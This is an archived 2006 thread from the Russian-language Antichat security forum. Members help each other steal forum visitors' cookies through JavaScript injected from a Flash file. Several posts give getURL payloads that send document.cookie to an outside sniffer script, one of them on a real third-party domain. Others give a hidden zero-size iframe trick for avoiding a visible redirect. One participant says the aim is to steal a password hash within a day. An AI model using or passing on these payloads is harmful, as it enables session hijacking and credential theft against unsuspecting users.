ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 30.08.2006, 21:01
ReanimatoR
Участник форума
Регистрация: 27.08.2006
Сообщений: 223
Провел на форуме:
2154209

Репутация: 341
Отправить сообщение для ReanimatoR с помощью ICQ
По умолчанию

getURL("javascript:location.replace('http://www.mountainboard.ru/cgi/sniff.cgi?'+document.cookie)")
я сделал так...но как возвращать ту же страницу в сниффере?() а то там открывается новая print "Location: ****";(или написать там $ref) Но тогда эта вся байда зациклица=()
 

  #12  
Старый 28.12.2006, 23:59
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

как сделать чтоб не было редиректа, а то это слишком палевно.
И кстати в Опере не работает, у кого какие идеи будут?

ЗЫ Реаниматор - ящик у тебя забит
 

  #13  
Старый 29.12.2006, 18:51
def_
Новичок
Регистрация: 30.08.2006
Сообщений: 16
Провел на форуме:
72325

Репутация: 18
По умолчанию

ajax должен помочь
 

  #14  
Старый 29.12.2006, 19:10
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

ajax? а подробней, и пример желателен у меня осталось менее суток чтоб украсть хеш и найти пароль
 

  #15  
Старый 29.12.2006, 20:02
def_
Новичок
Регистрация: 30.08.2006
Сообщений: 16
Провел на форуме:
72325

Репутация: 18
По умолчанию

http://www.yandex.ru/yandsearch?text=ajax&stype=www


вот еще способ обратиться по нужному адресу, работает в опере и ИЕ, в лисе не знаю.
в отличие от img= new Image();........ не палится ослом:
PHP код:
document.write('<iframe src="http://127.0.0.1/pixcb.php" id="lnk" width="0" height="0"></iframe><script>lnk.click()</script>'); 

Последний раз редактировалось def_; 29.12.2006 в 20:06..
 

  #16  
Старый 29.12.2006, 23:23
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

PHP код:
document.write('<iframe src="http://127.0.0.1/pixcb.php" id="lnk" width="0" height="0"></iframe><script>lnk.click()</script>'); 
блин, сто лет с пхп не работал:

Notice: Use of undefined constant document - assumed 'document' in z:\home\localhost\www\d\swf3.php on line 2
Fatal error: Call to undefined function: write() in z:\home\localhost\www\d\swf3.php on line 2


что оно от меня хочет? обьявить константу? как? и что-то я не понимаю как это мне заюзать
 

  #17  
Старый 29.12.2006, 23:26
Talisman
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772

Репутация: 517


Отправить сообщение для Talisman с помощью ICQ
По умолчанию

Цитата:
Сообщение от Thanat0z  
PHP код:
document.write('<iframe src="http://127.0.0.1/pixcb.php" id="lnk" width="0" height="0"></iframe><script>lnk.click()</script>'); 
блин, сто лет с пхп не работал:

Notice: Use of undefined constant document - assumed 'document' in z:\home\localhost\www\d\swf3.php on line 2
Fatal error: Call to undefined function: write() in z:\home\localhost\www\d\swf3.php on line 2


что оно от меня хочет? обьявить константу? как? и что-то я не понимаю как это мне заюзать
это не пшп код, это джава-скрипт код, а вставлен в тег пшп для удобства читабельности на форуме. просто вставляй как жс
 

  #18  
Старый 29.12.2006, 23:42
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

блин, я сначала отрабатываю на локал файлах, а потом уже тестю на форуме, так что скажите просто как и что куда вставлять, я запутался уже. Речь шла о флешке, потом дали мне пхп код с явакспиртом внутри, теперь говорят вставляй это в Js )))

Я уже ничего не понимаю.
Давайт по порядку

1) есть форум, в нем месаджи, моя подпись, аватар
2) есть код скрипта
3) есть снифер

Значит я должен вставтить код
1) в подпись в чистом виде
2) вставить в пост в чистом виде
3) заныкать его в "коды" форума
4) присоеденить через уже известные коды при этом линк будет на удаленный Js файл

Последний раз редактировалось Thanat0z; 29.12.2006 в 23:44..
 

  #19  
Старый 30.12.2006, 04:50
def_
Новичок
Регистрация: 30.08.2006
Сообщений: 16
Провел на форуме:
72325

Репутация: 18
По умолчанию

у тя был вопрос как сделать без редиректа и вообщ без палева отсылку куков на снифер, этот пример именно это и делает
пользоваться так:
код вставляешь в своем swf файле в getUrl("javascript: ");
все вставлено в яваскриптовский document.write потомучто iframe это не js, а html
 

  #20  
Старый 30.12.2006, 05:29
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

пробывал такое
Код:
getUrl('javascript:document.write(\'<iframe src="http://localhost/s/s.php?"+document.cookie id="lnk" width="0" height="0"></iframe><script>lnk.click()</script>\');');
и такое
Код:
getUrl('javascript:var cook; cook = document.cookie; document.write(\'<iframe src="http://localhost/s/s.php"\'+cook+\' id="lnk" width="0" height="0"></iframe>\');lnk.click();');

В обоих случаях чистый ивент в снифер, и пустая страничка темы куда это закинули, то есть редирект таки остался. Кто чем поможет?

ЗЫ очень важно что кавычки в конце и начале одинарные, то есть getUrl('javascript

Последний раз редактировалось Thanat0z; 15.01.2007 в 18:25..
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ